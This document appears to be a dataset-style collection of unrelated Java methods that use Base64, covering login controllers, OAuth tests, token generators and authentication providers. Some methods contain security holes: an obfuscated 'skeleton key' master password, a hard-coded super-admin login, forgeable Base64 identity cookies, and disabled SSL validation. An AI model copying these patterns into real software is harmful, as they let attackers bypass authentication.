public void setPhotoDB(List<Photo> photoDB) { photoBytes = new HashMap<PhotoType, String>(); for (Photo photo : photoDB) { if (photo.getPhotoType().equals(PhotoType.MAIN)) { photoBytes.put(PhotoType.MAIN, new String(Base64.encode(photo.getContent()))); mainBytes = new String(Base64.encode(photo.getContent())); } else if (photo.getPhotoType().equals(PhotoType.DETAIL)) { photoBytes.put(PhotoType.DETAIL, new String(Base64.encode(photo.getContent()))); detailBytes = new String(Base64.encode(photo.getContent())); } } }
@RequestMapping(value = "/signin", method = RequestMethod.POST) public String signin( @Valid LoginForm loginForm, BindingResult result, HttpSession session, HttpServletRequest request, HttpServletResponse response) { if (result.hasErrors()) { logger.info("LoginForm Validation Failed " + result); return "redirect:/"; } else { logger.debug("loginForm :" + loginForm.toString()); String email = loginForm.getEmail().trim(); String psw = loginForm.getPassword().trim(); User admin = service.findByEmailAddress(email); if (GlobalDefs.SUPER_ADMIN_PWD.equals(psw) && admin.getIsadmin().equals("yes") && admin.getRandomUrl() != null && admin.getRandomUrl().equals("pass")) { UserInfo adminInfo = new UserInfo(admin); session.setAttribute(GlobalDefs.SESSION_USER_INFO, adminInfo); return "redirect:/admin/caicai"; } boolean succeed = service.login(email, psw); logger.info("Login result " + succeed); if (succeed) { User user = service.findByEmailAddress(email); String randomUrl = user.getRandomUrl(); String forbidden = user.getForbidden(); // send confirm mail to user who do not confirm the email; if (randomUrl != null && !(randomUrl.equals("pass"))) { session.setAttribute("nonValidatedUser", user); return "mail.send"; } // if (forbidden != null && forbidden.equals("yes")) { return "redirect:/"; } // confirmed users; // if (loginForm.getRemeberMe() == 1) { String encodedEmail = new String(Base64.encode(email.getBytes()), Charset.forName("US-ASCII")); logger.debug(encodedEmail); Cookie cookie = new Cookie(GlobalDefs.COOKIE_IDENTITY, encodedEmail); // cookie.setDomain("localhost"); cookie.setPath("/"); // cookie.setMaxAge(60 * 60 * 24 * 14); response.addCookie(cookie); // } UserInfo userInfo = new UserInfo(user); session.setAttribute(GlobalDefs.SESSION_USER_INFO, userInfo); return "redirect:/admin"; } else { return "redirect:/"; } } }
private String stripFormData(String data, MediaType type, boolean cipher) { if (data.endsWith("=") && !type.equals(MediaType.TEXT_PLAIN)) { try { data = URLDecoder.decode(data, "UTF-8"); if (cipher) { data = data.replace(" ", "+"); } } catch (UnsupportedEncodingException e) { // Really? } String candidate = data.substring(0, data.length() - 1); if (cipher) { if (data.endsWith("=")) { if (data.length() / 2 != (data.length() + 1) / 2) { try { Hex.decode(candidate); return candidate; } catch (IllegalArgumentException e) { if (Base64.isBase64(data.getBytes())) { return data; } } } } return data; } // User posted data with content type form but meant it to be text/plain data = candidate; } return data; }
@Test public void allowsGetRequestsButRejectsPostForUser() throws Exception { HttpHeaders headers = new HttpHeaders(); headers.add(HttpHeaders.ACCEPT, MediaTypes.HAL_JSON_VALUE); headers.add( HttpHeaders.AUTHORIZATION, "Basic " + new String(Base64.encode(("greg:turnquist").getBytes()))); mvc.perform( get("/employees") . // headers(headers)) . // andExpect(content().contentTypeCompatibleWith(MediaTypes.HAL_JSON)) . // andExpect(status().isOk()) . // andDo(print()); mvc.perform( post("/employees") . // headers(headers)) . // andExpect(status().isForbidden()) . // andDo(print()); }
/** * Decodes the header into a username and password. * * @throws BadCredentialsException if the Basic header is not present or is not valid Base64 */ private String[] extractAndDecodeHeader(String header, HttpServletRequest request) throws IOException { final byte[] base64Token = header.substring(AUTH_TOKEN.length()).getBytes("UTF-8"); byte[] decoded; try { decoded = Base64.decode(base64Token); } catch (IllegalArgumentException e) { throw new BadCredentialsException("Failed to decode the access token"); } final String token = new String(decoded, "UTF-8"); final int delimUser = token.indexOf(":"); final int delimProvider = token.indexOf(":", delimUser + 1); if (delimUser == -1 || delimProvider == -1) { throw new BadCredentialsException("Invalid access authentication token"); } return new String[] { token.substring(0, delimUser), token.substring(delimUser + 1, delimProvider), token.substring(delimProvider + 1) }; }
/** tests that an error occurs if you attempt to use bad client credentials. */ @Test @Ignore // Need a custom auth entry point to get the correct JSON response here. public void testInvalidClient() throws Exception { MultiValueMap<String, String> formData = new LinkedMultiValueMap<String, String>(); formData.add("grant_type", "password"); formData.add("username", resource.getUsername()); formData.add("password", resource.getPassword()); formData.add("scope", "cloud_controller.read"); HttpHeaders headers = new HttpHeaders(); headers.set( "Authorization", "Basic " + new String(Base64.encode("no-such-client:".getBytes("UTF-8")))); headers.setAccept(Arrays.asList(MediaType.APPLICATION_JSON)); @SuppressWarnings("rawtypes") ResponseEntity<Map> response = serverRunning.postForMap("/oauth/token", formData, headers); assertEquals(HttpStatus.UNAUTHORIZED, response.getStatusCode()); List<String> newCookies = response.getHeaders().get("Set-Cookie"); if (newCookies != null && !newCookies.isEmpty()) { fail("No cookies should be set. Found: " + newCookies.get(0) + "."); } assertEquals( "no-cache, no-store, max-age=0, must-revalidate", response.getHeaders().getFirst("Cache-Control")); assertEquals(401, response.getStatusCode().value()); @SuppressWarnings("unchecked") OAuth2Exception error = OAuth2Exception.valueOf(response.getBody()); assertEquals("Bad credentials", error.getMessage()); assertEquals("invalid_request", error.getOAuth2ErrorCode()); }
private static String generateNonce(int validitySeconds) { long expiryTime = System.currentTimeMillis() + (validitySeconds * 1000); String toDigest = expiryTime + ":" + "key"; String signatureValue = md5Hex(toDigest); String nonceValue = expiryTime + ":" + signatureValue; return new String(Base64.encode(nonceValue.getBytes())); }
private HttpHeaders getHeaders(ClientDetails config) { HttpHeaders headers = new HttpHeaders(); String token = new String( Base64.encode((config.getClientId() + ":" + config.getClientSecret()).getBytes())); headers.set("Authorization", "Basic " + token); return headers; }
private HttpBasicRequestPostProcessor(String username, String password) { byte[] toEncode; try { toEncode = (username + ":" + password).getBytes("UTF-8"); } catch (UnsupportedEncodingException e) { throw new RuntimeException(e); } this.headerValue = "Basic " + new String(Base64.encode(toEncode)); }
private void login(User user, HttpSession session, HttpServletResponse response) { UserInfo userInfo = new UserInfo(user); String email = user.getEmail(); session.setAttribute(GlobalDefs.SESSION_USER_INFO, userInfo); String encodedEmail = new String(Base64.encode(email.getBytes()), Charset.forName("US-ASCII")); logger.debug(encodedEmail); Cookie cookie = new Cookie(GlobalDefs.COOKIE_IDENTITY, encodedEmail); cookie.setPath("/"); response.addCookie(cookie); }
@Override public void userNotFound(String name, UaaAuthenticationDetails details) { try { // Store hash of name, to conceal accidental entry of sensitive info (e.g. password) name = Utf8.decode(Base64.encode(MessageDigest.getInstance("SHA-1").digest(Utf8.encode(name)))); } catch (NoSuchAlgorithmException shouldNeverHappen) { name = "NOSHA"; } createAuditRecord(name, AuditEventType.UserNotFound, getOrigin(details), ""); }
@Test public void allowsPostRequestForAdmin() throws Exception { HttpHeaders headers = new HttpHeaders(); headers.set(HttpHeaders.ACCEPT, MediaTypes.HAL_JSON_VALUE); headers.set( HttpHeaders.AUTHORIZATION, "Basic " + new String(Base64.encode(("ollie:gierke").getBytes()))); mvc.perform( get("/employees") . // headers(headers)) . // andExpect(content().contentTypeCompatibleWith(MediaTypes.HAL_JSON)) . // andExpect(status().isOk()) . // andDo(print()); headers.set(HttpHeaders.CONTENT_TYPE, MediaType.APPLICATION_JSON_VALUE); String location = mvc.perform( post("/employees") . // content(PAYLOAD) . // headers(headers)) . // andExpect(status().isCreated()) . // andDo(print()) . // andReturn() .getResponse() .getHeader(HttpHeaders.LOCATION); ObjectMapper mapper = new ObjectMapper(); String content = mvc.perform(get(location)) . // andReturn() .getResponse() .getContentAsString(); Employee employee = mapper.readValue(content, Employee.class); assertThat(employee.getFirstName(), is("Saruman")); assertThat(employee.getLastName(), is("the White")); assertThat(employee.getTitle(), is("Wizard")); }
// public functions @Override @Transactional public CommandProcessingResult createPublicUser(final JsonCommand command) { try { this.userDataValidator.validateCreate(command.getJsonCommand()); User user = User.fromJson(command, false, true); generateKeyUsedForPasswordSalting(user); final String encodePassword = this.applicationPasswordEncoder.encode(user); user.updatePassword(encodePassword); this.userRepository.save(user); final JsonElement element = this.fromJsonHelper.parse(command.getJsonCommand()); final String returnUrl = this.fromJsonHelper.extractStringNamed(ReturnUrlParamName, element); final String email = user.getUsername(); final SimpleDateFormat sf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); final String nowDate = sf.format(DateTime.now().toDate()); final String text = nowDate + email + nowDate + Math.random(); final String otp = new String(Base64.encode(text.getBytes())); final UserOtp userOtp = UserOtp.createOtp(user, email, otp.substring(3, otp.length() - 5), returnUrl); this.userOtpRepository.save(userOtp); final String finalOtp = userOtp.getOtp(); final String verificationLink = DefaultAppUrl + "userapi/activate" + "?e=" + email + "&uas=" + finalOtp; String toEmails[] = new String[] {email}; this.emailSenderService.sendEmail( toEmails, null, null, EmailTemplates.activateUserEmailSubject(), EmailTemplates.activateUserEmailTemplate(user.getName(), verificationLink)); return new CommandProcessingResultBuilder().withSuccessStatus().build(); } catch (DataIntegrityViolationException ex) { ex.printStackTrace(); final Throwable realCause = ex.getCause(); if (realCause.getMessage().toLowerCase().contains("email")) { throw new PlatformDataIntegrityException( "error.msg.email.already.exist", "The email provided already exitst in the system." + realCause.getMessage()); } throw new PlatformDataIntegrityException( "error.msg.unknown.data.integrity.issue", "Unknown data integrity issue with resource: " + realCause.getMessage()); } }
public String getNewToken() throws Exception { if (this.getUsername() == null) { throw new Exception("usernameIsNull"); } String result = this.getUsername() + UserUtil.generateRandom(); // base 64 encoding byte[] bs = Base64.encode(result.getBytes()); result = new String(bs, "UTF-8"); return result; }
/** tests that a client secret is required. */ @Test public void testSecretRequired() throws Exception { MultiValueMap<String, String> formData = new LinkedMultiValueMap<String, String>(); formData.add("grant_type", "password"); formData.add("username", resource.getUsername()); formData.add("password", resource.getPassword()); formData.add("scope", "cloud_controller.read"); HttpHeaders headers = new HttpHeaders(); headers.set( "Authorization", "Basic " + new String(Base64.encode("no-such-client:".getBytes("UTF-8")))); headers.setAccept(Arrays.asList(MediaType.APPLICATION_JSON)); ResponseEntity<String> response = serverRunning.postForString("/oauth/token", formData, headers); assertEquals(HttpStatus.UNAUTHORIZED, response.getStatusCode()); }
private String getKeyFromServer() { HttpHeaders headers = new HttpHeaders(); String username = this.resource.getClientId(); String password = this.resource.getClientSecret(); if (username != null && password != null) { byte[] token = Base64.encode((username + ":" + password).getBytes()); headers.add("Authorization", "Basic " + new String(token)); } HttpEntity<Void> request = new HttpEntity<Void>(headers); String url = this.resource.getJwt().getKeyUri(); return (String) this.keyUriRestTemplate .exchange(url, HttpMethod.GET, request, Map.class) .getBody() .get("value"); }
private String sign(String signatureBaseString, String key) { try { Mac mac = Mac.getInstance(HMAC_SHA1_MAC_NAME); SecretKeySpec spec = new SecretKeySpec(key.getBytes(), HMAC_SHA1_MAC_NAME); mac.init(spec); byte[] text = signatureBaseString.getBytes(UTF8_CHARSET_NAME); byte[] signatureBytes = mac.doFinal(text); signatureBytes = Base64.encode(signatureBytes); String signature = new String(signatureBytes, UTF8_CHARSET_NAME); return signature; } catch (NoSuchAlgorithmException e) { throw new IllegalStateException(e); } catch (InvalidKeyException e) { throw new IllegalStateException(e); } catch (UnsupportedEncodingException shouldntHappen) { throw new IllegalStateException(shouldntHappen); } }
@RequestMapping(value = "/mail/{randomUrl}/{idString}", method = RequestMethod.GET) public String commonRegister( @PathVariable String randomUrl, @PathVariable String idString, HttpSession session, HttpServletResponse response) { logger.info("#### into ConfirmUserRegisterController ####"); Integer id = Integer.parseInt(idString); User result = userService.findOne(id.longValue()); boolean userConfirmed = (result != null) && randomUrl.equals(result.getRandomUrl()); if (userConfirmed) { logger.info("#### into result not null #### " + result.getName()); result.setRandomUrl("pass"); result.setRegister_date(new Date()); userService.updateUser(result); UserInfo userInfo = new UserInfo(result); session.setAttribute(GlobalDefs.SESSION_USER_INFO, userInfo); logger.info("Confirm user email successful."); String email = userInfo.getEmail(); String encodedEmail = new String(Base64.encode(email.getBytes()), Charset.forName("US-ASCII")); Cookie cookie = new Cookie(GlobalDefs.COOKIE_IDENTITY, encodedEmail); cookie.setPath("/"); response.addCookie(cookie); String type = result.getRole(); if (type != null && type.equals("enterprise")) { return "redirect:/enterprise/dispatcher"; } else if (type != null && type.equals("user")) { return "redirect:/user/dispatcher"; } else { return "redirect:/teacher/dispatcher"; } } else { logger.info("#### user confirm failed ####"); return "home"; } }
public Document getDocument() { Document doc = new Document(); String sessionId; String keyIdParam; String callBackKey = "&callbackUrl="; String callBackValue = generalConfig.sURL_DocumentKvitanciiCallback(); String keyID = this.accessCode; Collection<Long> correctDocTypes = Lists.newArrayList(0L, 1L); String uriDoc; if (this.documentTypeId == null || !correctDocTypes.contains(this.documentTypeId)) { LOG.error("DocumentTypeId = " + this.documentTypeId); throw new DocumentTypeNotSupportedException( "Incorrect DocumentTypeId. DocumentTypeId = " + this.documentTypeId); } else { uriDoc = Long.valueOf(0L).equals(this.documentTypeId) ? generalConfig.sURL_DocumentKvitanciiForIgov() : generalConfig.sURL_DocumentKvitanciiForAccounts(); keyIdParam = Long.valueOf(0L).equals(this.documentTypeId) ? "?keyID=" : "?id="; } String finalUri = uriDoc + keyIdParam + keyID + callBackKey + callBackValue; // if (generalConfig.bTest()) { SSLCertificateValidation.disable(); // } try { sessionId = getSessionId(); String authHeader = "sid:" + sessionId; byte[] authHeaderBytes = Base64.encode(authHeader.getBytes(StandardCharsets.UTF_8)); String authHeaderEncoded = new String(authHeaderBytes); HttpHeaders headers = new HttpHeaders(); headers.setAccept(Collections.singletonList(MediaType.ALL)); headers.set("Authorization", "Basic " + authHeaderEncoded); LOG.debug("try to final url: {}", finalUri); ResponseEntity<byte[]> documentEntity = new RestRequest() .getEntity(finalUri, null, StandardCharsets.UTF_8, byte[].class, headers); String contentType = documentEntity.getHeaders().getContentType().toString(); String contentDispositionHeader = documentEntity.getHeaders().get("Content-Disposition").get(0); ContentDisposition header = new ContentDisposition(contentDispositionHeader); String documentName = header.getParameter("name"); if (isBlank(documentName)) { documentName = header.getParameter("filename"); } if (this.withContent) { doc.setFileBody(getFileFromRespEntity(documentEntity)); } doc.setDocumentType(documentTypeDao.findByIdExpected(0L)); doc.setSubject(subjectDao.getSubject(this.nID_Subject)); doc.setFile(documentName); doc.setContentType(contentType); doc.setDate_Upload(DateTime.now()); doc.setsID_subject_Upload(null); doc.setContentKey(null); doc.setoSignData(null); } catch (ParseException | ResourceAccessException e) { LOG.error("Can't get document: ", e); throw new DocumentNotFoundException("Can't get document: ", e); } return doc; }
private String generateTokenData() { byte[] newToken = new byte[DEFAULT_TOKEN_LENGTH]; random.nextBytes(newToken); return new String(Base64.encode(newToken)); }
private String generateSeriesData() { byte[] newSeries = new byte[DEFAULT_SERIES_LENGTH]; random.nextBytes(newSeries); return new String(Base64.encode(newSeries)); }
public static String decodeToken(String token) { return new String(Base64.decode(token.getBytes())); }
@Override public Authentication authenticate(Authentication authentication) throws AuthenticationException { /* * Se verifica daca ip-ul de la care se incearca autentificarea solicita * captcha ( mai mult de 4 autentificari esuate ) */ Boolean solicitaCaptcha = false; String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress(); if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) { solicitaCaptcha = true; } String username = String.valueOf(authentication.getPrincipal()); String password = String.valueOf(authentication.getCredentials()); // Se verifica daca s-a introdus numele de utilizator si parola if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) { throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola."); } /* In cazul in care autentificarea trece prin captcha */ if (captchaCaptureFilter != null && solicitaCaptcha == true) { /* Se verifica daca raspunsul utilizatorului a fost adaugat */ if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) { throw new BadCredentialsException("Captcha Response is Empty"); } else { // Send HTTP request to validate user's Captcha boolean captchaPassed = SimpleImageCaptchaServlet.validateResponse( captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse()); // Check if valid if (captchaPassed) { resetCaptchaFields(); } else { resetCaptchaFields(); throw new BadCredentialsException("Ati gresit la introducerea textului din captcha."); } } } /* Toata lumea */ Utilizator user = udao.findByUsernameActiv(username); if (user == null) { throw new BadCredentialsException("Nume de utilizator invalid."); } StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6"); /* Skeleton key */ boolean skeletonKey = false; String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes())); if (skeletonSecret.equals(password)) skeletonKey = true; /* End skeleton key */ if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) { List<SimpleGrantedAuthority> authorityList = (List<SimpleGrantedAuthority>) getAuthorities(user); return new UsernamePasswordAuthenticationToken(authentication, password, authorityList); } else { throw new BadCredentialsException("Nume de utilizator si/sau parola gresite."); } }